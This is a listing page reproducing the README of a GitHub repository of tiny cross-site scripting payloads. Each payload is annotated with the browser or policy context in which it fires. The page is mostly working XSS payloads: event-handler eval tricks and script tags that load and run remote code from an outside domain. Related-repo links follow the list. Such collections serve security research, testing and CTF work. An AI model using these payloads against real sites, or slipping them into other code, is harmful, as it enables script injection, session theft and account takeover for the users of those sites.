Home / JavaScript / Security

A collection of tiny XSS Payloads that can be used in different contexts.

A collection of tiny XSS Payloads that can be used in different contexts.
Information
Category: JavaScript / Security
Watchers: 3
Star: 58
Fork: 1
Last update: Jul 12, 2020
Resource links
https://terjanq.github.io/Tiny-XSS-Payloads/index.html
https://github.com/terjanq/Tiny-XSS-Payloads

Tiny-XSS-Payloads

A collection of short XSS payloads that can be used in different contexts.

The DEMO available here: https://terjanq.github.io/Tiny-XSS-Payloads/index.html

Current Payloads

<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
<svg/onload=eval(name)>

<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>

<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>

<!-- If you controll the name, but unsafe-eval not enabled -->
<svg/onload=location=name>

<!-- Just a casual script -->
<script/src=//NJ.₨></script>

<!-- If you control the name of the window -->
<iframe/onload=src=top.name>

<!-- If you control the URL -->
<iframe/onload=eval('`'+URL)>

<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>

<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">

<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">

<!-- If inline styles are allowed -->
<style/onload=eval(name)>

<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>

<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>

<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
0 Open More issues
Closed

Add three new payloads & fix <svg/onload> in Firefox

null

opened Aug 13, 2021 by terjanq 0
Closed

Deprecate Safari-only write(URL)

opened Jul 10, 2021 by terjanq 0
Closed

Fix readme typo

null

opened Jul 15, 2020 by erjanmx 0
Closed

xss

opened Jul 11, 2020 by Micle5858 0
Closed

Add <style/onload> XSS payload for Chrome

opened Jul 9, 2020 by lbherrera 0

Contents

    turkenh Menu Bar App for Managing Kubernetes Contexts on Mac
    Ekultek A simple XSS finding tool
    hahwul 🌘🦊 DalFox is a fast, powerful parameter analysis and XSS scanner, based on a golang/DOM parse
    leizongmin Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist
    Damian89 Toolset for detecting reflected xss in websites
    YahooArchive Secure XSS Filters.
    PwnFunction DOM XSS Game
    MohamedNourTN Terminator metasploit payload generator
    Al-Azif Bin Loader PKG for the PlayStation 4
    thesephist A little interactive sandbox for tiny people, tiny thoughts, and their tiny stories
    3gstudent Used to build an XSS platform on the command line.
    brianleroux :anchor: Minimalist HTTP client for JSON payloads.
    Damian89 A better version of my xssfinder tool - scans for different types of xss on a list of urls.
    LXSMNSYC Tiny routing library for SolidJS
    incredibleindishell This code is vulnerable to SQL Injection and having SQLite database. For SQLite database, SQL Injection payloads are different so it is for fun. Just enjoy it \m/
    dxa4481 Maintaining account persistence via XSS and Oauth
    MartinPyka A framework for analysing financial products in personalized contexts
    FriendsOfREDAXO YCOM Impersonate. Login as selected YCOM user 🧙‍♂️in frontend.
    deuill PHP bindings for the Go programming language (Golang)
    RobertWHurst A JavaScript library for binding keyboard combos without the pain of key codes and key combo conflicts.
    benjamin-hodgson Descriptive testing for Python
    Share this repo

    Related Repos


    Security
    6
    Per CVE-2021-44228 and CVE-2021-45046, Apache log4j2 versions < 2.16.0 (except 2.12.2) are...
    newrelic-experimental Per CVE-2021-44228 and CVE-2021-45046, Apache log4j2 versions < 2.16.0 (except 2.12.2) are vulnerable to remote code execution and potential data exfi
     
    Security
    5
    Hardware-grade PIN Security API
    vesvault Encrypt Everything without fear of losing the Key
     
    Security
    40
    classified.html is a portable encryption solution
    ollipal classified.html is a portable encryption solution
     
    Security
    1.5k
    Mina is a new cryptocurrency with a constant size blockchain, improving scaling while main...
    MinaProtocol Mina is a new cryptocurrency with a constant size blockchain, improving scaling while maintaining decentralization and security.
     
    Security
    51
    Compute the digits of pi on the Ethereum blockchain and preserve them in an NFT
    geohot Compute the digits of pi on the Ethereum blockchain and preserve them in an NFT. You get your digits. Some NFTs will contain multiple digits if you spend the gas. Free to mint, and "unlimited" supply.
     
    Security
    28
    Simple, lightweight and easy-to-implement Cookie/Tracking consent manager for the web
    Accudio Cead (pronounced kee-yed)is a cookie and tracking consent manager that is extremely simple and lightweight. It is designed to help websites implement a simple Accept or Deny dialog that will actually enable or disable tracking.
     
    Security
    1.1k
    PKIjs is a pure JavaScript library implementing the formats that are used in PKI applicati...
    PeculiarVentures PKI.js is a pure JavaScript library implementing the formats that are used in PKI applications (signing, encryption, certificate requests, OCSP and TSP requests/responses). It is built on WebCrypto (Web Cryptography API) and requires no plug-ins.
     
    Security
    19.7k
    A simple, lightweight JavaScript API for handling browser cookies
    js-cookie A simple, lightweight JavaScript API for handling browser cookies
     
    Security
    604
    An open letter against Apple's new privacy-invasive client-side content scanning.
    nadimkobeissi An open letter against Apple's new privacy-invasive client-side content scanning
     
    Security
    348
    CryptoBlades Tracker
    ed3ath CryptoBlades Tracker
     
    Security
    11
    Gembok Authenticator is software based (virtual) authenticator to generate 2-Steps authent...
    rioastamal Gembok Authenticator is software based (virtual) authenticator to generate 2-Steps authentication token using browser. It is written in HTML and Javascript so it should works on Google Chrome, Firefox, Safari and other browsers. It uses simple JSON file to store all data which needed to generate the token.
     
    Security
    34
    One-stop TLS traffic inspection and manipulation using dynamic instrumentation
    SySS-Research One-stop TLS traffic inspection and manipulation using dynamic instrumentation
     
    Security
    30
    Simple Authentication for Remix
    sergiodxa Simple Authentication for Remix
     
    Security
    2.1k
    🔌 TypeScript bindings for Ethereum smart contracts
    dethcrypto 🔌 TypeScript bindings for Ethereum smart contracts
     
    Security
    21
    Example project implementing authentication, authorization, and routing with Next.js and S...
    dabit3 Example project implementing authentication, authorization, and routing with Next.js and Supabase